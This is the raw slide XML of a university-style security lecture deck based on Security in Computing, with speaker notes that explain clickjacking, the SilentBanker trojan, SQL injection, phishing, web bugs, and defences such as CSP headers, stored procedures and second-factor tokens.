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9" r:id="rId2"/>
    <p:sldMasterId id="2147483674" r:id="rId3"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId65"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId4"/>
    <p:sldId id="703" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="684" r:id="rId7"/>
    <p:sldId id="685" r:id="rId8"/>
    <p:sldId id="686" r:id="rId9"/>
    <p:sldId id="687" r:id="rId10"/>
    <p:sldId id="688" r:id="rId11"/>
    <p:sldId id="689" r:id="rId12"/>
    <p:sldId id="258" r:id="rId13"/>
    <p:sldId id="682" r:id="rId14"/>
    <p:sldId id="259" r:id="rId15"/>
    <p:sldId id="395" r:id="rId16"/>
    <p:sldId id="680" r:id="rId17"/>
    <p:sldId id="396" r:id="rId18"/>
    <p:sldId id="679" r:id="rId19"/>
    <p:sldId id="397" r:id="rId20"/>
    <p:sldId id="260" r:id="rId21"/>
    <p:sldId id="681" r:id="rId22"/>
    <p:sldId id="261" r:id="rId23"/>
    <p:sldId id="262" r:id="rId24"/>
    <p:sldId id="693" r:id="rId25"/>
    <p:sldId id="263" r:id="rId26"/>
    <p:sldId id="264" r:id="rId27"/>
    <p:sldId id="696" r:id="rId28"/>
    <p:sldId id="265" r:id="rId29"/>
    <p:sldId id="266" r:id="rId30"/>
    <p:sldId id="267" r:id="rId31"/>
    <p:sldId id="268" r:id="rId32"/>
    <p:sldId id="683" r:id="rId33"/>
    <p:sldId id="386" r:id="rId34"/>
    <p:sldId id="387" r:id="rId35"/>
    <p:sldId id="383" r:id="rId36"/>
    <p:sldId id="385" r:id="rId37"/>
    <p:sldId id="384" r:id="rId38"/>
    <p:sldId id="269" r:id="rId39"/>
    <p:sldId id="690" r:id="rId40"/>
    <p:sldId id="691" r:id="rId41"/>
    <p:sldId id="692" r:id="rId42"/>
    <p:sldId id="377" r:id="rId43"/>
    <p:sldId id="378" r:id="rId44"/>
    <p:sldId id="379" r:id="rId45"/>
    <p:sldId id="380" r:id="rId46"/>
    <p:sldId id="381" r:id="rId47"/>
    <p:sldId id="382" r:id="rId48"/>
    <p:sldId id="664" r:id="rId49"/>
    <p:sldId id="389" r:id="rId50"/>
    <p:sldId id="390" r:id="rId51"/>
    <p:sldId id="665" r:id="rId52"/>
    <p:sldId id="391" r:id="rId53"/>
    <p:sldId id="392" r:id="rId54"/>
    <p:sldId id="270" r:id="rId55"/>
    <p:sldId id="271" r:id="rId56"/>
    <p:sldId id="272" r:id="rId57"/>
    <p:sldId id="273" r:id="rId58"/>
    <p:sldId id="274" r:id="rId59"/>
    <p:sldId id="275" r:id="rId60"/>
    <p:sldId id="666" r:id="rId61"/>
    <p:sldId id="694" r:id="rId62"/>
    <p:sldId id="667" r:id="rId63"/>
    <p:sldId id="706"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ity" initials="C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189"/>
    <p:restoredTop sz="76685" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="93" d="100"/>
          <a:sy n="93" d="100"/>
        </p:scale>
        <p:origin x="1152"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commentAuthors" Target="commentAuthor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DBE4C0-EED3-2140-8D11-4E9DCB635921}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/23/19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6F2D3D-CCF0-D346-87BD-D795F5DB6BF0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29818531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browsers have in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> many ways become our new operating systems, the increases in complexity and scrutiny can be seen in this chart of newly discovered browser vulnerabilities.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139162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Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is a way of tricking users into providing desired input. The attacker makes the input dialog transparent and places an image with an enticement below the transparent dialog. The user ends up answering a question he didn’t even know he was being asked, unknowingly authorizing his computer to execute the attacker’s will. “Framing”—moving and layering HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>—is an important component of this attack.</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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3482716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Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is a way of tricking users into providing desired input. The attacker makes the input dialog transparent and places an image with an enticement below the transparent dialog. The user ends up answering a question he didn’t even know he was being asked, unknowingly authorizing his computer to execute the attacker’s will. “Framing”—moving and layering HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>—is an important component of this attack.</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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3896066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Two frame-breaking methods available for site programmers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Content Security Policy (CSP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP response header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-Frame-Options </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Response Heade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>rs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FDE21CB-C08B-447C-B146-1155992F1420}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2098268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Unwanted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>rowser toolbars are an example that just about every</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> student will have had experience with.</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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1960600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of this example attack is that the application returns the entire account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>s table from the database.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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2781117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Stored procedures effectively</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> separate SQL code from SQL data, thus preventing most SQL injection attacks.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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2077544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education has become more scientific over the years,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> with products like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>PhishMe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> automating the user training process and focusing on the worst offenders. PGP and S/MIME are both solutions for encrypting and signing email.</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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2670169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types of browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> attack are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> covered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> in more depth in the next few slides.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24083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 rates of detection found (&lt;25%) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FDE21CB-C08B-447C-B146-1155992F1420}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3184550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SilentBanker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was a Trojan that generally installed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> as a browser plug-in. When it detected the user going to a banking URL, it would intercept keystrokes and even modify them so that money transfers would go to attackers’ accounts.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3281754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CAPTCHAs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> are used by websites to defeat automation, such as by preventing spammers from scripting the creation of massive numbers of email accounts. By using dummy websites to entice users into solving CAPTCHAs, attackers can effectively defeat the CAPTCHAs at scale.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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="539261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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> examples of these mechanisms are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>SecurID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> tokens, Google Authenticator, and text message codes. Driver signing is an example of using such techniques to mitigate local malware.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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49624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 fake banking website meant to trick users.</a:t>
            </a:r>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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2212674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 software download site meant to trick users into downloading malicious applications.</a:t>
            </a:r>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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1545917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tiny image served up from one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>provider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>ClicksRUs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>”) that allows user behavior to be tracked across many sites for advertising purposes. Students probably notice this when they see web ads that offer up items very similar to ones they’ve recently been shopping for on other sites. Web bugs can also be used to track users’ reading of advertising emails.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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3631236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AB2B9E-EB16-4ABD-A5EB-BDC1A50EA7CB}"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35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7D0E49-9711-47A1-8B0B-99E5CE7F0D6C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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949409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6E7B54-A456-4334-97E7-00A50918EEF9}"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275426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A6FEF-D295-4F8C-9F1D-B2B800C00C94}"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867260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AB2B9E-EB16-4ABD-A5EB-BDC1A50EA7CB}"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15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E4DEE7-1334-48CE-A3F2-1DD21B1A58E0}"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1180866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E4DEE7-1334-48CE-A3F2-1DD21B1A58E0}"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580346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3358A-F143-4C19-89E9-28F2D188A97F}"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60578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7CDCF5-3115-443F-848A-9D305AD02988}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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82845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A744A-EF4B-4A38-853C-90C1AC1DD7BB}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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4237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E31D2D-B351-4B5B-8151-21A8AD3EEC72}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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47222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E4DEE7-1334-48CE-A3F2-1DD21B1A58E0}"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599259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7C1D3-02FE-432B-95EF-DCA8BD0CB50F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6518479"/>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08382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AE4E0-FAAB-4210-A047-DA631847307A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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013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7D0E49-9711-47A1-8B0B-99E5CE7F0D6C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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1169344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6E7B54-A456-4334-97E7-00A50918EEF9}"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16794744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A6FEF-D295-4F8C-9F1D-B2B800C00C94}"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1496910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478802-5BAD-4D4C-A9BA-0785FCCC72BA}"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7514088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69225" cy="1930400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{17832444-4830-4194-8C9D-367C8F47836E}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>3/23/19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Malware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{6CBD83E5-80DB-40C3-9D21-E0017198AFE8}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10997845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AB2B9E-EB16-4ABD-A5EB-BDC1A50EA7CB}"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645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E4DEE7-1334-48CE-A3F2-1DD21B1A58E0}"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188106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3358A-F143-4C19-89E9-28F2D188A97F}"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37041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E4DEE7-1334-48CE-A3F2-1DD21B1A58E0}"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10400073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7CDCF5-3115-443F-848A-9D305AD02988}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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5869094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A744A-EF4B-4A38-853C-90C1AC1DD7BB}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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8360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E31D2D-B351-4B5B-8151-21A8AD3EEC72}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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5115354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7C1D3-02FE-432B-95EF-DCA8BD0CB50F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6518479"/>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317481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AE4E0-FAAB-4210-A047-DA631847307A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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6948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7D0E49-9711-47A1-8B0B-99E5CE7F0D6C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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6085770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6E7B54-A456-4334-97E7-00A50918EEF9}"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10579165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A6FEF-D295-4F8C-9F1D-B2B800C00C94}"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34955240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06B166A-436A-1841-AE12-83209903EE56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F2DAEDD-E3B0-4326-9018-AC1B07F2EDB4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABAA3C59-7809-F645-80D0-B5DEB4745A2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>From Security in Computing, Fifth Edition, by Charles P. Pfleeger, et al. (ISBN: 9780134085043). Copyright 2015 by Pearson Education, Inc. All rights reserved.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86E070F7-FF7C-D14B-85B7-8D7A4BB76E2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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7219812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69225" cy="1930400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{17832444-4830-4194-8C9D-367C8F47836E}" type="datetime1">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>3/23/19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Malware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{6CBD83E5-80DB-40C3-9D21-E0017198AFE8}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116465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3358A-F143-4C19-89E9-28F2D188A97F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3/23/19</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22123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7CDCF5-3115-443F-848A-9D305AD02988}" type="datetime1">
